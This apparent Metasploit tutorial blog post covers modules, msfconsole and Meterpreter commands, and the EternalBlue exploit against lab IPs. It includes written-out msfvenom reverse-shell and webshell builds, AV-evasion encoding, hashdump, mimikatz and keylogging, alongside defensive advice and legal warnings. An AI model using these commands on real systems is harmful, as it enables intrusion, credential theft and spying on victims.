Metasploit Framework Explained: Usage and Pentest Workflow thumbnail

Metasploit Framework Explained: Usage and Pentest Workflow

⏱ approx. 22 min views 103 likes 0 LOG_DATE:2026-05-09
TOC

Metasploit Framework #

Metasploit Framework is the open-source attack framework built for penetration testing and vulnerability validation. Its goal is to let you find and demonstrate weaknesses from an attacker's point of view, so defenders can quantify their risk and act on it. It is standard equipment for security researchers, red teams, and educators worldwide, and it ships built-in with Kali Linux.

1. The history of Metasploit #

1.1 Born from HD Moore's project (2003) #

In 2003, HD Moore started the project as a personal effort. The first version was a small Perl toolkit — a "library of attack code" designed to make known vulnerabilities quick to verify.

At the time, vulnerability proof-of-concepts were scattered all over the place, each with its own invocation, arguments, and output. Researchers were repeating the same plumbing work over and over. Metasploit fixed this with one core idea: drive everything from a unified interface.

1.2 Rewritten in Ruby (2007) #

Version 3.0 was a complete rewrite in Ruby. It was easier to extend than the Perl version, and it gave the project the foundation for modules, database integration, and Meterpreter (covered later). Open-source community contributions surged, and an independent ecosystem grew up around it.

1.3 Acquired by Rapid7 (2009) #

In 2009, Rapid7 — a US vulnerability management vendor — acquired the Metasploit Project. The Framework (the open-source edition) continues under a BSD-style license, while the commercial editions (Metasploit Pro / Express) layer in enterprise features (GUI, automation, reporting, phishing) on top.

1.4 Today #

The Framework is still under active development on GitHub, with new modules landing as new CVEs are published. It ships in Kali Linux by default, and certifications like SANS GPEN and OSCP test it as a hands-on skill.

2. Architecture #

Metasploit isn't a single binary — it's a framework of cooperating components.

2.1 Major components #

Component Role
msfconsole The interactive shell. The most-used UI.
msfvenom Standalone payload generator (replaces the older msfpayload + msfencode).
msfdb Manages a PostgreSQL instance and integrates host / service / vulnerability data into Metasploit.
msfrpcd RPC daemon. Exposes Metasploit programmatically — used by tools like Cobalt Strike.
msfupdate Module updates (replaced by apt update on modern Kali).

2.2 Module taxonomy #

Every capability is implemented as a module, organized under /usr/share/metasploit-framework/modules/.

Type Role Example
exploit Abuse a vulnerability for remote code execution exploit/windows/smb/ms17_010_eternalblue
auxiliary Support functions — scanners, fuzzers, listeners — without code execution auxiliary/scanner/portscan/tcp
payload The code that runs on the target after exploitation windows/x64/meterpreter/reverse_tcp
post Post-exploitation: collection, lateral movement, persistence post/windows/gather/credentials/credential_collector
encoder Transform payload bytes to evade AV signatures x86/shikata_ga_nai
nop NOP-sled generators x86/single_byte
evasion Generate executables built for AV evasion windows/windows_defender_exe

3. The basic workflow #

A typical Metasploit-driven penetration test looks like this.

1. Reconnaissance
   ├── Enumerate open ports with nmap
   └── Identify service versions (e.g., Apache 2.4.49)

2. Vulnerability identification
   └── search apache 2.4.49

3. Module selection
   └── use exploit/multi/http/apache_normalize_path_rce

4. Configure
   ├── set RHOSTS 192.168.56.50
   ├── set LHOST 192.168.56.106
   └── set PAYLOAD linux/x64/meterpreter/reverse_tcp

5. Run
   └── exploit (or run)

6. Post-exploitation
   ├── sysinfo / getuid / hashdump
   ├── lateral movement to other hosts (autoroute, pivoting)
   └── persistence

7. Wrap-up
   └── In a lab, don't forget cleanup.

4. Major module types in detail #

4.1 exploit #

The core that actually abuses a vulnerability. Pick one with use, set the required options (RHOSTS, target OS, etc.) with set, then fire with exploit.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > show options
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.50
msf6 exploit(ms17_010_eternalblue) > exploit

4.2 auxiliary #

Support modules that don't execute code on the target. Includes scanners (port scan, version detection), brute-force, authentication checks, and listeners (HTTP/SMB servers for phishing).

msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(smb_version) > set RHOSTS 192.168.56.0/24
msf6 auxiliary(smb_version) > run

4.3 payload #

The code that runs on the target after compromise. Comes in three structures:

  • single (inline): a self-contained payload that runs as one binary. Larger but reliable.
  • stager: a small initial piece of code. Downloads the body (the stage) over the network, then executes it. Used when an exploit only has a small buffer to work with.
  • stage: the body the stager loads. Holds rich functionality like Meterpreter.

Examples:

  • windows/shell/reverse_tcp — classic reverse shell
  • windows/x64/meterpreter/reverse_tcp — full Meterpreter
  • cmd/unix/reverse_python — one-liner Python reverse shell
  • linux/x64/meterpreter/reverse_https — Meterpreter wrapped in HTTPS, easier to slip through firewalls

4.4 post #

Modules that automate post-exploitation tasks.

  • post/windows/gather/credentials/credential_collector — pull credentials of various kinds
  • post/multi/recon/local_exploit_suggester — suggest local privilege-escalation candidates
  • post/windows/manage/migrate — migrate to a different parent process to dodge detection

4.5 encoder #

Transforms the bytes of a payload to dodge AV signature matching. x86/shikata_ga_nai ("shikata ga nai" — Japanese for "it can't be helped") is the classic one. But modern AV uses behavioral analysis and sandboxing in addition to static signatures — encoders alone won't get you past it.

4.6 evasion #

A more recent addition: modules that generate executables with AV evasion built in (windows/windows_defender_exe, etc.).

5. Major msfconsole commands #

# Search
search ms17_010
search type:exploit platform:windows author:zerosum0x0

# Pick a module / step out
use exploit/windows/smb/ms17_010_eternalblue
back                    # back out one level
use 0                   # by index in search results

# Module info
info
show options
show targets
show payloads

# Parameters
set RHOSTS 192.168.56.50
set LHOST eth0           # interface names work too
setg LHOST 10.0.2.4      # globally — applies to every module

# Run
exploit                  # foreground
exploit -j -z            # background (-j: as a job, -z: don't immediately enter session)
run                      # synonym for exploit (often used for auxiliary)

# Sessions
sessions -l              # list
sessions -i 1            # attach to ID 1
background (or Ctrl+Z)   # park current session, return to msfconsole
sessions -K              # kill all

# Jobs
jobs -l
jobs -K                  # kill all jobs

# Database integration (run msfdb init first)
workspace -a redteam     # create a workspace
db_nmap -sS 192.168.56.0/24
hosts                    # discovered hosts
services                 # discovered services
vulns                    # candidate vulnerabilities
loot                     # collected files

# Misc
help [command]
banner                   # show the banner again
exit / quit

6. Meterpreter #

Meterpreter is Metasploit's signature payload — a stealthy shell replacement that lives in memory rather than on disk. It runs on Windows, Linux, macOS, and Android.

6.1 What makes it different #

  • Memory-resident: doesn't drop a binary to disk; uses techniques like reflective DLL injection, which makes AV detection harder
  • Encrypted communications: after the stager loads, the body talks over AES-encrypted channels
  • Modular extension: can load additional capabilities (stdapi, priv, kiwi) at runtime
  • Cross-platform: the same command set works across operating systems

6.2 Major commands #

# System info
sysinfo                  # OS, arch, etc.
getuid                   # current user
getpid                   # PID
ps                       # process list

# Privilege escalation (Windows)
getsystem                # try to escalate to SYSTEM
hashdump                 # dump SAM hashes (requires SYSTEM)
load kiwi                # load mimikatz inside Meterpreter
kiwi_cmd "sekurlsa::logonpasswords"

# File operations
ls / pwd / cd
download remote.txt
upload local.exe C:\\Windows\\Temp\\

# Process operations
migrate <PID>            # migrate to another process (avoid detection / change privilege)
execute -f cmd.exe -i    # run a command (-i for interactive)

# Capture
screenshot               # capture the screen
keyscan_start            # start keylogging
keyscan_dump             # show captured keystrokes
keyscan_stop

# Networking
ipconfig
netstat
portfwd add -l 3389 -p 3389 -r 10.0.0.5    # local port forward
run autoroute -s 10.0.0.0/24                # add route into the internal network (pivoting)

# Native shell
shell                    # spawn the native shell (cmd / sh)
exit                     # back out (shell) / disconnect (Meterpreter)

6.3 Pivoting (lateral movement) #

Use the compromised host as a stepping stone to reach the internal network. Meterpreter's autoroute lets subsequent scans and exploits route automatically through the foothold.

meterpreter > run autoroute -s 10.0.0.0/24

msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 10.0.0.5
msf6 auxiliary(tcp) > run    # ← this scan goes through the compromised host

7. msfvenom — payload generation #

The standalone payload-generation tool that ships with Metasploit Framework.

7.1 Basic syntax #

msfvenom -p <payload> [options] -f <format> [-o output_file]

Major options:

  • -p <payload>: payload name (e.g. windows/x64/meterpreter/reverse_tcp)
  • -l <type>: list available payloads / encoders / formats
  • LHOST=, LPORT=: reverse-connect destination (passed with =, not set)
  • -f <format>: output format (exe, elf, raw, asp, php, python, …)
  • -e <encoder>: encoder (e.g. x86/shikata_ga_nai)
  • -i <count>: encoding iterations
  • -b <bad chars>: bytes to exclude (e.g. \x00\x0a\x0d)
  • -o <file>: output path

7.2 Examples #

# Windows reverse-TCP exe
msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f elf -o shell.elf

# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f raw -o shell.php

# Shellcode for buffer-overflow practice
msfvenom -p linux/x86/shell_reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -b '\x00\x0a\x0d' \
    -f c

# Try AV evasion (5 iterations of encoding)
msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=443 \
    -e x86/shikata_ga_nai -i 5 \
    -f exe -o shell.exe

7.3 Receiving the payload (handler) #

Use multi/handler to wait for a generated payload to call back.

msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.56.106
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j      # listen in the background

8. A worked example: EternalBlue (MS17-010) #

The SMBv1 vulnerability that WannaCry weaponized in 2017. Standard practice against unpatched Windows 7 / Server 2008 R2 machines.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.50
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.106
msf6 exploit(ms17_010_eternalblue) > set LPORT 4444
msf6 exploit(ms17_010_eternalblue) > check     # pre-flight vulnerability check

[+] 192.168.56.50:445 - Host is likely VULNERABLE to MS17-010!

msf6 exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.56.106:4444
[*] 192.168.56.50:445 - ...exploitation successful...
[*] Sending stage (200774 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened (192.168.56.106:4444 -> 192.168.56.50:49158)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM    ← straight to SYSTEM
meterpreter > sysinfo
Computer        : DC01
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : ja_JP
Domain          : LAB
Logged On Users : 2
Meterpreter     : x64/windows

This shows up regularly in lab environments (HackTheBox's Blue, OSCP lab machines).

9. Metasploit from the defender's perspective #

Metasploit is an attack tool, but for defenders, it's also the best validation tool you can ask for.

9.1 Signature detection #

The payloads Metasploit produces are heavily analyzed by AV vendors. Even with encoding, most endpoint-protection products will catch them via static detection plus behavioral analysis. In real environments, anything generated straight from msfvenom should be assumed to trip alarms quickly.

Bypass techniques exist but none of them is foolproof:

  • Custom loaders: hand-rolled packers and shellcode loaders
  • C2 frameworks: Cobalt Strike, Sliver, Mythic — commercial / OSS frameworks with more sophisticated evasion than Metasploit
  • LotL (Living off the Land): abuse legitimate signed binaries (PowerShell, mshta.exe, etc.)

9.2 Network detection #

Meterpreter's reverse callbacks are flagged by IDS/IPS signatures (e.g. Suricata's Emerging Threats ruleset). HTTPS Meterpreter and DNS exfiltration try to evade detection, but TLS-MITM environments and centralized DNS logging unmask them.

9.3 Defense playbook #

  • Don't sit on known CVEs — most Metasploit exploit modules target them
  • Keep endpoint protection (EDR) up to date
  • Disable legacy features like SMBv1 / LLMNR / NetBIOS
  • Use Privilege Access Management (LAPS, just-in-time admin) to limit lateral movement
  • Aggregate logs (SIEM) to flag suspicious PowerShell and new processes

10. Ethics and legal considerations #

Metasploit is powerful, and using it against systems you don't have permission to test is a crime. In Japan it can fall under the Act on Prohibition of Unauthorized Computer Access and the Penal Code (obstruction of business by damaging electronic computers).

Restrict use to:

  • Environments you own (your home LAN, your own VMs, lab platforms like HackTheBox or VulnHub)
  • Penetration tests with written, advance authorization (signed contract with the client)
  • CTFs where the organizer has explicitly invited attack

"I just wanted to try a PoC", "I tested it on a friend's server", "I escalated privileges on a coworker's PC" — all illegal. Operating in clean, ethical, and legal environments is the prerequisite for a sustainable career in this field.

11. Summary #

  • Metasploit Framework is the open-source penetration-testing framework. Started by HD Moore, currently stewarded by Rapid7, still under active development.
  • Capabilities are organized as modules (exploit / auxiliary / payload / post / encoder / nop / evasion).
  • msfconsole is the central UI, msfvenom generates standalone payloads, msfdb integrates a database.
  • Meterpreter is the in-memory stealth shell, with powerful post-exploitation commands like migrate, hashdump, and autoroute.
  • For defenders, it's also the best validation tool — run the same techniques in your own environment and verify your defenses notice them.
  • Ethics and law: only use it where you're authorized.